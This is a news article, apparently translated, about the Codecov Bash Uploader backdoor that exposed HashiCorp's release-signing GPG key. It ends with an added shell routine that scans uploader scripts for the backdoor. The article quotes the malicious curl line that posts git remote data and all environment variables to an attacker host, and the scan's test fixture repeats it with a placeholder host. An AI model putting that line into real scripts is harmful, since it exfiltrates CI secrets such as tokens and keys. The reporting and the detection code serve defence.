Malicious code injected into the Codecov script led to the compromise of HashiCorp's PGP key

HashiCorp, known for developing the open source tools Vagrant, Packer, Nomad and Terraform, has announced the leak of the private GPG key used to create the digital signatures that verify its releases. Attackers who gained access to the GPG key could potentially make hidden changes to HashiCorp products and certify them with a valid digital signature. At the same time, the company stated that during its audit no traces of any attempt to make such modifications were found.

The compromised GPG key has now been revoked and a new key has been issued in its place. The problem affects only verification using the SHA256SUM and SHA256SUM.sig files; it does not affect the creation of digital signatures for the Linux DEB and RPM packages delivered via releases.hashicorp.com, nor the verification mechanisms for macOS and Windows (AuthentiCode).

The leak occurred because the Codecov Bash Uploader script (codecov-bash), designed to upload code coverage reports from continuous integration systems, was used in HashiCorp's infrastructure. During the attack on the Codecov company, a backdoor was hidden in that script through which passwords and encryption keys were sent to a server controlled by the attackers.

To carry out the intrusion, the attackers exploited an error in the way the Codecov Docker image was built, which allowed them to extract credentials for GCS (Google Cloud Storage) that were needed to modify the Bash Uploader script distributed from the codecov.io website. The changes were made as early as January 31, went undetected for two months, and allowed the attackers to extract data stored in customers' continuous integration environments. Using the added malicious code, the attackers could obtain information about the Git repository under test and all environment variables, including tokens, encryption keys and passwords passed to continuous integration systems to grant access to application code, repositories and services such as Amazon Web Services and GitHub.

In addition to being invoked directly, the Codecov Bash Uploader script was used as a component of other uploaders, such as Codecov-action (GitHub), Codecov-circleci-orb and Codecov-bitrise-step, whose users are also affected by the problem. All users of codecov-bash and related products are advised to audit their infrastructure and to rotate passwords and encryption keys. The presence of the backdoor in the script can be checked by looking for the line curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http:// /upload/v2 || true
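The check described above, turned into a small scan routine as an added example (not code from the article, Codecov or HashiCorp): it flags any curl line in a local copy of the uploader script that POSTs the output of $(env) to a /upload/v2 endpoint, and is exercised against two constructed sample scripts whose host name is an obvious placeholder.

```shell
#!/usr/bin/env sh
# Added example: scan a local copy of a Codecov Bash Uploader script for the
# exfiltration pattern described in the article: a curl call that POSTs
# "$(git remote -v)" and "$(env)" to an external /upload/v2 endpoint.
# Exit status 0 means the pattern was found (script is suspect), 1 means clean.
scan_codecov_script() {
    file="$1"
    # A single curl command (no pipe in between) that carries -d, expands
    # $(env) into the body, and targets a /upload/v2 path.
    grep -Eq 'curl[^|]*-d[^|]*\$\(env\)[^|]*/upload/v2' "$file"
}

# Constructed sample: a clean fragment of an uploader script.
make_clean_sample() {
    cat > "$1" <<'EOF'
#!/usr/bin/env bash
VERSION="1.0.3"
curl -X POST --data-binary @coverage.xml "https://codecov.io/upload/v4?commit=$commit"
EOF
}

# Constructed sample: the same fragment with a backdoor line of the shape the
# article quotes. PLACEHOLDER_HOST stands in for the redacted attacker host.
make_backdoored_sample() {
    cat > "$1" <<'EOF'
#!/usr/bin/env bash
VERSION="1.0.3"
curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http://PLACEHOLDER_HOST/upload/v2 || true
curl -X POST --data-binary @coverage.xml "https://codecov.io/upload/v4?commit=$commit"
EOF
}

# Report a verdict for each constructed sample, then clean up.
run_demo() {
    tmp=$(mktemp -d)
    make_clean_sample "$tmp/clean.sh"
    make_backdoored_sample "$tmp/bad.sh"
    for f in "$tmp/clean.sh" "$tmp/bad.sh"; do
        if scan_codecov_script "$f"; then
            echo "SUSPECT: $f contains an env-exfiltration curl line"
        else
            echo "clean:   $f"
        fi
    done
    rm -rf "$tmp"
}

run_demo
```

In a real audit, run scan_codecov_script against every cached copy of the uploader in CI runners and build images, not only the one fetched today, since the tampered version was served for two months.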

source: budenet.ru
